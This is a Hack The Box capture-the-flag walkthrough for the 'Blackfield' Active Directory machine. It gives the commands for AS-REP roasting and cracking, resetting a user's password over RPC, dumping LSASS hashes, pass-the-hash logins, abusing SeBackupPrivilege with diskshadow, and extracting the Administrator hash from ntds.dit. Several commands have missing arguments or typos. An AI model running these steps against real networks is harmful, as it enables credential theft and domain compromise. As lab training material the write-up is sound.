HTB Walkthrough Blackfield

Box Summary:

Blackfield has been released on 6th of june in 2020, Blackfield is rated as Hard.

From nmap we can assume that we are dealing with a AD machine, after some enumeration we can connect to SMB anonymously, when we connect to profiles$ we see a lot usernames but a few stands out since they don’t start with capital letters. after some more enumeration we found out that we could try kerbroasting attack. after getting user credentials we needed some logical thinking, what can we do with this user? turns out we can change a password. after that we get access to another share where are some sensentive files are located, after downloading them we were able te get a hash from svc_backup. Now we were able to get the user flag. Now it’s time for privesc svc_backup has SeBackupPrivilege enabled. After some researching we can exploit this to get Administrator privileges.


Nmap scan

nmap -sV -sC –top-ports=6000

This shows it’s an Active Directory machine.

SMB Shares Enumeration
Because SMB in enabled I wanted to check for SMB shares.
smbclient -L

Only 1 share is anonymous accessible; profiles$
smbclient //$

But by examining the files there was nothing useful in these files.


Also, anonymous login with RPC failed.


After some enumeration of the services which are running I determined that we couldn’t use any of this service for further enumeration. Because this is an Active Directory machine I looked for common Active Directory exploitation vectors.


We know SMB is enabled, so we can check with common usernames, if one of those usernames pre-auth is enabled for one of the users so we can intercept the hash and crack it.

Contents of usernames.txt

python blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash

Cracking the intercepted hash

john –wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash

Cracked password: #00^BlackKnight

The credentials are:
support: #00^BlackKnight


I couldn’t access any SMB share with these credentials but I was able to login with rpcclient.
rpcclient -U support

First, I enumerated for more users.

In rpcclient, you have an option called; setuserinfo2. With this option we can update a user’s password.

The only user where I could do this successfully was by: audit2020

setuserinfo2 audit2020 23 IceL0rd

Now that we have updated the audit2020 password, we can try if we can have access to an SMB share.

Access SMB share with updated password

Connecting to the forensic share.
smbclient -U ‘blackfield\audit2020’ \\\forensic

After some enumeration of the SMB shares, I found an interesting file which can contain a hash.

Now download

smbget smb:// -U audit2020

I used mimidump to dump the hashes
pypykatz lsa minidump lsass.DMP

After this I am going to read out the dump file

Pass the hash svc_backup

Because port 5985 is open we can use evil-winrm to login with the hash.

evil-winrm -i blackfield -u svc_backup -H ‘9658d1d1dcd9250115e2205d9f48400d’

By enumerating the token, we can see that SeBackupPrivilege token is enabled.

Checking Tokes

Note: This Github page is owned by giuliano108. Secwalk won’t/can’t be responsible for any damage or the content.

whoami /priv

Exploiting the SeBackupPrivilege token

First, we need to download the 2 dll, (see resource) and put on the system.

upload /tmp/Blackfield/exploitation/SeBackupPrivilegeUtils.dll
upload /tmp/Blackfield/exploitation/SeBackupPrivilegeCmdLets.dll

Now we need to import those 2 DLL’s and enable the token.

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

But we can’t copy the root flag, and read it.

Changing File Permissions NTDS

What we can do is changing file permission of the file ntds.dit (which contain administrator hash).

$acl = Get-Acl $folder
$rule = new-object System.Security.AccessControl.FileSystemAccessRUle $user, “FullControl”, “ContainerInherit,ObjectInherit”, “None”, “Allow”
Set-Acl -Path $folder -AclObject $acl

Creating ShadowCopy

In order to create a shadow, copy we run diskshadow with the following lines:

set metadata C:\temp\
set context clientaccessibles
set context persistents
begin backups
add volume c: alias mydrives
expose %mydrive% z:s

Uploaded it to target system.
upload /tmp/Blackfield/exploitation/scipt.txt

Diskshadow /s scipt.txt

If we look now in our directories we see 2 files that we need to download in order to dump the hash.

Now we have the 2 files we needed on the Kali system.

Now we can sue in order to dump the hash.

python -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash

head -n 5 admin_hash.ntds

Pass the hash Administrator

evil-winrm -i -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply